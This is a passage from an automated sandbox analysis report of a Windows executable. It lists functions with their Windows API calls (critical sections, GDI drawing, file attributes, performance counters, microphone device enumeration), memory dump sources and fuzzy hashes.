                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3111dceef54b192a201187cebb12310cd19e01e5115420dd7c98ed3fae01612e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2921A73520174A4BD710AF66E888BFFB7B8EB60305F00852FEB4643251C779A84ADB64
                                                                                                                                                                                                                                                                                                        Function 004D8010 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 004D802E
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 004D8044
                                                                                                                                                                                                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 004D8067
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 004D8075
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004D8078
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Object$Select$BrushCreateDeleteFillRectSolid
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3777265051-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                                                                                                                                                                        • Instruction ID: d8a686452ba02d7e488f009474b8275e6b936404318e954abf19810798465268
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76019A752042046FC304DB69ED88C6B7BF8EACD614B000A5DFA8983312E635E806DB71
                                                                                                                                                                                                                                                                                                        Function 004E4660 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E468C
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,0041D485), ref: 004E46A2
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D0
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D9
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46E6
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Delete$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3104255891-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                                                                                                                                                                        • Instruction ID: c031ed0988ac34fb64eb35ca7992c3622ed3d26c78e5592643255ae209dbdd49
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D101D4B750060C5BC2106B35EC81BAF73A8AFC4214F05051EF54F93241DA68B8088BA1
                                                                                                                                                                                                                                                                                                        Function 004CFD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFileAttributesExA.KERNEL32(?,00000000,?,00000000,2E736D6D,?,?,?,?,?,?,?,?,0041C852,00000000,?), ref: 004CFE0F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                                                                                                                                                                        • GetFileAttributesExW.KERNEL32(00000000,00000000,?,?,?,00000000,2E736D6D,?,?,?,?,?,?,?,?,0041C852), ref: 004CFDAF
                                                                                                                                                                                                                                                                                                        • GetFileAttributesExA.KERNEL32(00000000,00000000,?,2E736D6D,?,?,?,?,?,?,?,?,0041C852,00000000,?,00000000), ref: 004CFDED
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile$Version
                                                                                                                                                                                                                                                                                                        • String ID: \\?\
                                                                                                                                                                                                                                                                                                        • API String ID: 3849939888-4282027825
                                                                                                                                                                                                                                                                                                        • Opcode ID: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                                                                                                                                                                        • Instruction ID: f991edffad243b4bd670aca913d189ed867c40d808b57564552852d0b3f79ee3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6431277A90031067D710AA65AC42FEB73995F85704F54042FF90687352EB6D9C0EC2EA
                                                                                                                                                                                                                                                                                                        Function 004FA670 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,00000000), ref: 004FA67B
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004FA749
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F9B30: EnterCriticalSection.KERNEL32(?,00000000,?,004FA7A6,?,?,7772FFB0), ref: 004F9B35
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F9B30: LeaveCriticalSection.KERNEL32(?), ref: 004F9B84
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000100,00000000,00000000,?), ref: 004FA715
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                                                                                                                                                                                                                                                                                        • String ID: FriendlyName
                                                                                                                                                                                                                                                                                                        • API String ID: 904232820-3623505368
                                                                                                                                                                                                                                                                                                        • Opcode ID: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4f25218f4a75fa1caa45750efdb6ff353ea89136e06b91a5ad3ed6f7a0914714
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A212A75244301AFD220EB54DC49F5BB7F8BF88714F008A1DFA899B290D774F8098BA6
                                                                                                                                                                                                                                                                                                        Function 004CAB90 Relevance: 6.2, APIs: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004CADB4
                                                                                                                                                                                                                                                                                                        • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 004CADC8
                                                                                                                                                                                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 004CADD8
                                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 004CADFF
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Create$CompatibleDeleteObjectSection
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3137390749-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                                                                                                                                                                        • Instruction ID: ec125f8efd539a004f5243cd975522e641b23088832de904e1665531ca55df12
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2981AFB56043458FC324CF29D484A67FBF1BF98314F148A6ED58A87712D334E989CBA6
                                                                                                                                                                                                                                                                                                        Function 0052AFD0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32 ref: 0052AFF0
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0052B016
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C25F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0040C250: Sleep.KERNEL32(00000000,?,?,0052B390,?,004012F9,00000008), ref: 0040C272
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C279
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 0052B050
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0052B05B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CounterExchangeInterlockedPerformanceQuery$Compare$Sleep
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 188302963-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                                                                                                                                                                        • Instruction ID: 331ae7ec3883c6fb41667714d1c2397b805b788a0704fbfdebc2abdcd4384ec1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19212A75604712ABC318DF65D884A9AF7E8BF89300F040A1DE85993780D734F918CBA2
                                                                                                                                                                                                                                                                                                        Function 004E5C20 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E4850: waveInGetNumDevs.WINMM(defaultmicrophone,00000000,?,00000000,?,?,?,?,004E8459,?,?,?,?,?,?,?), ref: 004E489B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E4C80: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C7E,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E4C8A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E4C80: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E4CD7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E3860: EnterCriticalSection.KERNEL32(?,00000000,?,004E5C91,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E3868
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E3860: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E388F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E5B40: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C9B,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?), ref: 004E5B4C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004E5B40: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5B71
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000004,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E5CA2
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5CB2
                                                                                                                                                                                                                                                                                                        Strings
